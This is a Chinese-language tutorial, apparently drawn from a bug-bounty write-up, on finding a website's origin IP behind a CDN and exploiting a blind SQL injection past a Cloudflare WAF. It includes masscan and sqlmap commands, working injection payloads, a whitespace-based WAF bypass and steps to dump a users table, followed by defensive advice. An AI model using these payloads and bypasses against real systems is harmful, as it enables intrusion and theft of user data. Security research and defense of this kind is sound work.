绕过WAF：追踪源站IP与SQL注入技术详解<\/h1>

1 核心概念基础<\/h2>

1.1 DNS系统与记录类型<\/h3>

DNS作用<\/strong>：互联网寻址系统，实现域名与IP地址的映射转换<\/li>
A记录<\/strong>：域名到IPv4地址的映射（example.com → 23.215.0.138）<\/li>
AAAA记录<\/strong>：域名到IPv6地址的映射<\/li>

CNAME记录<\/strong>：域名到域名的映射（ryukudz.com → itsryuku.github.io）<\/li> <\/ul>
1.2 自治系统号(ASN)<\/h3>

定义<\/strong>：互联网网络中唯一标识符，代表由单一组织管理的IP地址集合<\/li>
重要性<\/strong>：帮助识别属于同一实体的IP地址范围<\/li>
注意点<\/strong>：目标可能托管在云服务提供商(AWS、GCP、Azure)的IP空间而非自有ASN<\/li> <\/ul>
1.3 源站IP与CDN<\/h3>

源站IP<\/strong>：后端服务器的真实IP地址，通常被CDN隐藏<\/li>
CDN作用<\/strong>：提高性能并提供安全层(Web应用程序防火墙)<\/li>
安全意义<\/strong>：绕过CDN即同时绕过WAF防护，大幅降低漏洞利用难度<\/li> <\/ul>
2 源站IP发现技术<\/h2>
2.1 历史DNS记录查询<\/h3>

原理<\/strong>：查询域名历史DNS记录，寻找CDN启用前的源站IP<\/li>
常用工具<\/strong>：

ViewDNS.info：基础历史记录查询<\/li>
Censys\/SecurityTrails：深度DNS数据查询（需免费试用账户）<\/li> <\/ul> <\/li>
局限性<\/strong>：成熟公司会实施IP轮换策略降低此方法有效性<\/li> <\/ul>
2.2 ASN网络映射技术<\/h3>

ASN识别<\/strong>：通过Hurricane Electric BGP Toolkit查询目标组织关联的IP范围<\/li>
网络映射<\/strong>：使用asnmap工具通过ASN映射网络范围<\/li>
存活主机扫描<\/strong>：使用masscan进行大范围端口扫描<\/li> <\/ol>
sudo masscan -iL ranges.txt -p1-65535 --exclude 255.255.255.255 --rate 100000<\/span> --output-format json --output-filename scan-results.json <\/span><\/span><\/code><\/pre> 结果过滤<\/strong>：提取存活主机信息<\/li> <\/ol> cat scan-results.json | sed -e '\/^ <\/span><\/span><\/span>$$ <\/span><\/span><\/span>\/d'<\/span> -e '\/^ <\/span><\/span><\/span>$$ <\/span><\/span><\/span>\/d'<\/span> -e 's\/,$\/\/'<\/span> | jq -r '[.ip, .ports[0].port] | @tsv'<\/span> | sed 's\/\t\/:\/'<\/span> | sort -u > alive-hosts <\/span><\/span><\/code><\/pre>2.3 源站IP验证<\/h3> 方法<\/strong>：使用Burp Suite Intruder对存活IP列表进行模糊测试<\/li> 关键设置<\/strong>：保持Host头为原始域名(www.target.com)，替换IP地址参数<\/li> 识别特征<\/strong>：响应状态码200 OK且内容与原始响应完全一致<\/li> <\/ul> 3 SQL注入漏洞利用<\/h2> 3.1 漏洞识别与确认<\/h3> 可疑端点<\/strong>：GET \/api\/videos?topic=1337<\/code><\/li> 基础测试<\/strong>：单引号测试(1337%27<\/code>) → 500错误<\/li> 双引号测试(1337%27%27<\/code>) → 200正常<\/li> <\/ul> <\/li> 布尔盲注确认<\/strong>： 1337'+AND'1'=1--<\/code> → 数据返回<\/li> 1337'+AND'1'=2--<\/code> → 无结果返回<\/li> 1337'+and+length(version())>1--<\/code> → 数据返回<\/li> <\/ul> <\/li> <\/ul> 3.2 WAF绕过技术<\/h3> 初始阻挡<\/strong>：直接函数调用被Cloudflare WAF阻断<\/li> 空格绕过<\/strong>：在函数名与括号间添加空格成功绕过被阻断：ascii(substring(current_database(),1,1))>32<\/code><\/li> 已绕过：ascii+(substring+(current_database(),1,1))>32<\/code><\/li> <\/ul> <\/li> 数据提取<\/strong>：数据库名长度：length+(current_database())=10<\/code><\/li> 版本信息长度：length+(version())=104<\/code><\/li> 逐字符提取：ascii+(substring+(current_database(),1,1))=102<\/code>（字符'f'）<\/li> <\/ul> <\/li> <\/ul> 3.3 自动化利用与数据提取<\/h3> sqlmap枚举数据库<\/strong>：<\/li> <\/ul> python3 sqlmap.py -u 'https:\/\/149.106.193.134\/api\/videos?topic=1815'<\/span> --host=<\/span>www.target.com --headers=<\/span>'User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36'<\/span> -p topic --dbms=<\/span>PostgreSQL --dbs --technique=<\/span>B --level=<\/span>5<\/span> --risk 3<\/span> --no-cast --threads 10<\/span> <\/span><\/span><\/code><\/pre> 表结构枚举<\/strong>：识别包含敏感信息的users表<\/li> 数据导出<\/strong>：直接导出敏感用户数据作为漏洞证明<\/li> <\/ul> 4 完整技术流程总结<\/h2> 漏洞发现<\/strong>：识别可能存在SQL注入的API端点<\/li> 基础验证<\/strong>：通过布尔盲注确认漏洞存在<\/li> WAF对抗<\/strong>：使用空格混淆等技术绕过Cloudflare防护<\/li> 源站追踪<\/strong>：通过历史DNS记录或ASN映射寻找真实IP<\/li> 直接访问<\/strong>：绕过CDN直接与源站服务器交互<\/li> 自动化利用<\/strong>：使用sqlmap等工具高效提取数据<\/li> 漏洞报告<\/strong>：提供充分证据包括敏感数据样本<\/li> <\/ol> 5 防御建议<\/h2> 正确CDN配置<\/strong>：确保源站IP正确隐藏，实施IP轮换策略<\/li> WAF规则优化<\/strong>：检测函数名与括号间的空格混淆尝试<\/li> 输入验证<\/strong>：对所有用户输入实施严格的参数化查询<\/li> 错误处理<\/strong>：避免向客户端返回详细数据库错误信息<\/li> 网络监控<\/strong>：监控直接访问源站IP的异常请求模式<\/li> <\/ul> 此技术手册详细记录了从漏洞发现到完整利用的全过程，重点强调了源站IP发现这一关键环节在绕过WAF防护中的重要作用。<\/p>